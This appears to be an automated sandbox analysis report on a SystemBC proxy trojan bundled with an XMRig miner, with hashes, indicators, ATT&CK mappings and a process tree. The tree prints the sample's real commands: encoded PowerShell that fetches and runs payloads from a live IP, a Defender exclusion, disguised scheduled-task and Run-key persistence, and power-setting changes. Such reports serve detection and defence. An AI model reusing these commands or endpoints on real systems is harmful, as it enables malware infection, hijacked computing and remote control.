systembc | 3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d

Analysis

max time kernel
149s
max time network
152s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
05-05-2023 08:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b392d04cf1c1d1f456d4c98db918adf7.exe
Size

141KB
MD5

b392d04cf1c1d1f456d4c98db918adf7
SHA1

8b6485f29a5416d19085ce42c414367f61ab3717
SHA256

3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d
SHA512

99fc5271441f28cd6e1edf62c9ee64d004453b4d887f6cddf26145dad3b11b54807e224378e7b91f1dd5c19b2cd8fac4b91d004e7f240fd393dcbe9f33c40014
SSDEEP

3072:2bbfPwSEsGVqwkwDapiUlhK0fOWIOGPk4HWGTH+x9:2bbfPwPqyaq/WIm42GL+L

Score

10^/10

systembc xmrig evasion miner persistence trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/o.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/r.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/file.png

Extracted

Family

systembc

185.161.248.16:4440

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs

Processes:

OneDrive.exeOneDrive.exe

description	pid	process	target process
PID 1800 created 1328	1800	OneDrive.exe	Explorer.EXE
PID 1800 created 1328	1800	OneDrive.exe	Explorer.EXE
PID 1800 created 1328	1800	OneDrive.exe	Explorer.EXE
PID 1820 created 1328	1820	OneDrive.exe	Explorer.EXE
PID 1820 created 1328	1820	OneDrive.exe	Explorer.EXE
PID 1820 created 1328	1820	OneDrive.exe	Explorer.EXE
PID 1820 created 1328	1820	OneDrive.exe	Explorer.EXE

SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

dllhost.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dllhost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dllhost.exe

XMRig Miner payload 10 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1820-151-0x000000013F860000-0x000000014022A000-memory.dmp	xmrig
behavioral1/memory/1552-177-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1552-183-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1552-188-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1552-192-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1552-196-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1552-200-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1552-204-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1552-208-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1552-212-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

5 2028 powershell.exe
6 1220 powershell.exe
7 1372 powershell.exe
10 2028 powershell.exe
11 2028 powershell.exe
Downloads MZ/PE file

flow	pid	process
5	2028	powershell.exe
6	1220	powershell.exe
7	1372	powershell.exe
10	2028	powershell.exe
11	2028	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

dllhost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dllhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dllhost.exe

Executes dropped EXE 5 IoCs

Processes:

OneDrive.exedllhost.exeOneDrive.exelsass.exelsass.exe

pid process

1800 OneDrive.exe
1752 dllhost.exe
1820 OneDrive.exe
112 lsass.exe
776 lsass.exe
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

dllhost.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Wine dllhost.exe
Loads dropped DLL 3 IoCs

Processes:

powershell.exetaskeng.exelsass.exe

pid process

2028 powershell.exe
1920 taskeng.exe
112 lsass.exe

pid	process
1800	OneDrive.exe
1752	dllhost.exe
1820	OneDrive.exe
112	lsass.exe
776	lsass.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Wine	dllhost.exe

pid	process
2028	powershell.exe
1920	taskeng.exe
112	lsass.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

lsass.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe"	lsass.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

Processes:

dllhost.exelsass.exelsass.exe

pid process

1752 dllhost.exe
112 lsass.exe
776 lsass.exe
776 lsass.exe
776 lsass.exe
776 lsass.exe
776 lsass.exe
776 lsass.exe
776 lsass.exe

pid	process
1752	dllhost.exe
112	lsass.exe
776	lsass.exe
776	lsass.exe
776	lsass.exe
776	lsass.exe
776	lsass.exe
776	lsass.exe
776	lsass.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

OneDrive.exe

description	pid	process	target process
PID 1820 set thread context of 592	1820	OneDrive.exe	conhost.exe
PID 1820 set thread context of 1552	1820	OneDrive.exe	conhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1580 schtasks.exe
304 schtasks.exe
1760 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1512 timeout.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

lsass.exe

pid process

776 lsass.exe

pid	process
1580	schtasks.exe
304	schtasks.exe
1760	schtasks.exe

pid	process
1512	timeout.exe

pid	process
776	lsass.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeOneDrive.exepowershell.exedllhost.exeOneDrive.exepowershell.exe

pid	process
1220	powershell.exe
2028	powershell.exe
1372	powershell.exe
1264	powershell.exe
2028	powershell.exe
2028	powershell.exe
1800	OneDrive.exe
1800	OneDrive.exe
1800	OneDrive.exe
1800	OneDrive.exe
304	powershell.exe
1800	OneDrive.exe
1800	OneDrive.exe
2028	powershell.exe
2028	powershell.exe
1752	dllhost.exe
2028	powershell.exe
2028	powershell.exe
1820	OneDrive.exe
1820	OneDrive.exe
1820	OneDrive.exe
1820	OneDrive.exe
936	powershell.exe
1820	OneDrive.exe
1820	OneDrive.exe
1820	OneDrive.exe
1820	OneDrive.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

468

pid	process
468

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exelsass.execonhost.exelsass.exe

description	pid	process
Token: SeDebugPrivilege	1220	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeShutdownPrivilege	1776	powercfg.exe
Token: SeShutdownPrivilege	832	powercfg.exe
Token: SeDebugPrivilege	304	powershell.exe
Token: SeShutdownPrivilege	1864	powercfg.exe
Token: SeShutdownPrivilege	1580	powercfg.exe
Token: SeShutdownPrivilege	928	powercfg.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeShutdownPrivilege	1224	powercfg.exe
Token: SeShutdownPrivilege	1776	powercfg.exe
Token: SeShutdownPrivilege	580	powercfg.exe
Token: SeDebugPrivilege	112	lsass.exe
Token: SeLockMemoryPrivilege	1552	conhost.exe
Token: SeLockMemoryPrivilege	1552	conhost.exe
Token: SeDebugPrivilege	776	lsass.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

conhost.exe

pid	process
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

conhost.exe

pid	process
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe
1552	conhost.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

lsass.exelsass.exe

pid process

112 lsass.exe
776 lsass.exe

pid	process
112	lsass.exe
776	lsass.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b392d04cf1c1d1f456d4c98db918adf7.exepowershell.execmd.exepowershell.exetaskeng.execmd.exepowershell.exeOneDrive.exelsass.exe

description	pid	process	target process
PID 1764 wrote to memory of 1264	1764	b392d04cf1c1d1f456d4c98db918adf7.exe	powershell.exe
PID 1764 wrote to memory of 1264	1764	b392d04cf1c1d1f456d4c98db918adf7.exe	powershell.exe
PID 1764 wrote to memory of 1264	1764	b392d04cf1c1d1f456d4c98db918adf7.exe	powershell.exe
PID 1764 wrote to memory of 1220	1764	b392d04cf1c1d1f456d4c98db918adf7.exe	powershell.exe
PID 1764 wrote to memory of 1220	1764	b392d04cf1c1d1f456d4c98db918adf7.exe	powershell.exe
PID 1764 wrote to memory of 1220	1764	b392d04cf1c1d1f456d4c98db918adf7.exe	powershell.exe
PID 1764 wrote to memory of 2028	1764	b392d04cf1c1d1f456d4c98db918adf7.exe	powershell.exe
PID 1764 wrote to memory of 2028	1764	b392d04cf1c1d1f456d4c98db918adf7.exe	powershell.exe
PID 1764 wrote to memory of 2028	1764	b392d04cf1c1d1f456d4c98db918adf7.exe	powershell.exe
PID 1764 wrote to memory of 1372	1764	b392d04cf1c1d1f456d4c98db918adf7.exe	powershell.exe
PID 1764 wrote to memory of 1372	1764	b392d04cf1c1d1f456d4c98db918adf7.exe	powershell.exe
PID 1764 wrote to memory of 1372	1764	b392d04cf1c1d1f456d4c98db918adf7.exe	powershell.exe
PID 2028 wrote to memory of 1800	2028	powershell.exe	OneDrive.exe
PID 2028 wrote to memory of 1800	2028	powershell.exe	OneDrive.exe
PID 2028 wrote to memory of 1800	2028	powershell.exe	OneDrive.exe
PID 1732 wrote to memory of 1776	1732	cmd.exe	powercfg.exe
PID 1732 wrote to memory of 1776	1732	cmd.exe	powercfg.exe
PID 1732 wrote to memory of 1776	1732	cmd.exe	powercfg.exe
PID 1732 wrote to memory of 832	1732	cmd.exe	powercfg.exe
PID 1732 wrote to memory of 832	1732	cmd.exe	powercfg.exe
PID 1732 wrote to memory of 832	1732	cmd.exe	powercfg.exe
PID 1732 wrote to memory of 1864	1732	cmd.exe	powercfg.exe
PID 1732 wrote to memory of 1864	1732	cmd.exe	powercfg.exe
PID 1732 wrote to memory of 1864	1732	cmd.exe	powercfg.exe
PID 1732 wrote to memory of 1580	1732	cmd.exe	powercfg.exe
PID 1732 wrote to memory of 1580	1732	cmd.exe	powercfg.exe
PID 1732 wrote to memory of 1580	1732	cmd.exe	powercfg.exe
PID 304 wrote to memory of 1760	304	powershell.exe	schtasks.exe
PID 304 wrote to memory of 1760	304	powershell.exe	schtasks.exe
PID 304 wrote to memory of 1760	304	powershell.exe	schtasks.exe
PID 2028 wrote to memory of 1752	2028	powershell.exe	dllhost.exe
PID 2028 wrote to memory of 1752	2028	powershell.exe	dllhost.exe
PID 2028 wrote to memory of 1752	2028	powershell.exe	dllhost.exe
PID 2028 wrote to memory of 1752	2028	powershell.exe	dllhost.exe
PID 1920 wrote to memory of 1820	1920	taskeng.exe	OneDrive.exe
PID 1920 wrote to memory of 1820	1920	taskeng.exe	OneDrive.exe
PID 1920 wrote to memory of 1820	1920	taskeng.exe	OneDrive.exe
PID 2028 wrote to memory of 112	2028	powershell.exe	lsass.exe
PID 2028 wrote to memory of 112	2028	powershell.exe	lsass.exe
PID 2028 wrote to memory of 112	2028	powershell.exe	lsass.exe
PID 2028 wrote to memory of 112	2028	powershell.exe	lsass.exe
PID 1716 wrote to memory of 928	1716	cmd.exe	powercfg.exe
PID 1716 wrote to memory of 928	1716	cmd.exe	powercfg.exe
PID 1716 wrote to memory of 928	1716	cmd.exe	powercfg.exe
PID 1716 wrote to memory of 1224	1716	cmd.exe	powercfg.exe
PID 1716 wrote to memory of 1224	1716	cmd.exe	powercfg.exe
PID 1716 wrote to memory of 1224	1716	cmd.exe	powercfg.exe
PID 1716 wrote to memory of 1776	1716	cmd.exe	powercfg.exe
PID 1716 wrote to memory of 1776	1716	cmd.exe	powercfg.exe
PID 1716 wrote to memory of 1776	1716	cmd.exe	powercfg.exe
PID 1716 wrote to memory of 580	1716	cmd.exe	powercfg.exe
PID 1716 wrote to memory of 580	1716	cmd.exe	powercfg.exe
PID 1716 wrote to memory of 580	1716	cmd.exe	powercfg.exe
PID 936 wrote to memory of 1580	936	powershell.exe	schtasks.exe
PID 936 wrote to memory of 1580	936	powershell.exe	schtasks.exe
PID 936 wrote to memory of 1580	936	powershell.exe	schtasks.exe
PID 1820 wrote to memory of 592	1820	OneDrive.exe	conhost.exe
PID 1820 wrote to memory of 1552	1820	OneDrive.exe	conhost.exe
PID 112 wrote to memory of 304	112	lsass.exe	schtasks.exe
PID 112 wrote to memory of 304	112	lsass.exe	schtasks.exe
PID 112 wrote to memory of 304	112	lsass.exe	schtasks.exe
PID 112 wrote to memory of 304	112	lsass.exe	schtasks.exe
PID 112 wrote to memory of 776	112	lsass.exe	lsass.exe
PID 112 wrote to memory of 776	112	lsass.exe	lsass.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1328

C:\Users\Admin\AppData\Local\Temp\b392d04cf1c1d1f456d4c98db918adf7.exe
"C:\Users\Admin\AppData\Local\Temp\b392d04cf1c1d1f456d4c98db918adf7.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028

C:\Users\Admin\AppData\Roaming\OneDrive.exe
"C:\Users\Admin\AppData\Roaming\OneDrive.exe"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1800

C:\Users\Admin\AppData\Roaming\dllhost.exe
"C:\Users\Admin\AppData\Roaming\dllhost.exe"
4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1752

C:\Users\Admin\AppData\Roaming\lsass.exe
"C:\Users\Admin\AppData\Roaming\lsass.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:112

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 10:26 /du 23:59 /sc daily /ri 1 /f
5⤵
- Creates scheduled task(s)
PID:304

C:\ProgramData\lsass\lsass.exe
"C:\ProgramData\lsass\lsass.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:776

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpC717.tmp.bat""
5⤵
PID:1852

C:\Windows\SysWOW64\timeout.exe
timeout 7
6⤵
- Delays execution with timeout.exe
PID:1512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:304

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
3⤵
- Creates scheduled task(s)
PID:1760

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1732

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1776

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:832

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1864

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "OneDrive"
2⤵
PID:1300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:936

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
3⤵
- Creates scheduled task(s)
PID:1580

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:928

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1776

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:580

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
PID:592

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1552

C:\Windows\system32\taskeng.exe
taskeng.exe {D2017F94-1CB7-45FA-902E-E5BC99451B6D} S-1-5-21-2647223082-2067913677-935928954-1000:BPOQNXYB\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1920

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1820

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\lsass\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
C:\ProgramData\lsass\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpC717.tmp.bat

Filesize
154B

MD5
afc9dc2e8fc59ccef6090d61ee42c25f

SHA1
abd4364a3c4e297989abcbe361560c92ffa4a3aa

SHA256
f5b371233d235cc12f770ad10e85671b8f42a18236491e359f5567ff05b429e8

SHA512
05a17a8936885effd0f9aabe5bce141acc02523a7553669f090978f1313115a6c565ba41f77d081a4a93c0f32d0c3bd917123f879ecc6e047c88ec912bbab1cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpC717.tmp.bat

Filesize
154B

MD5
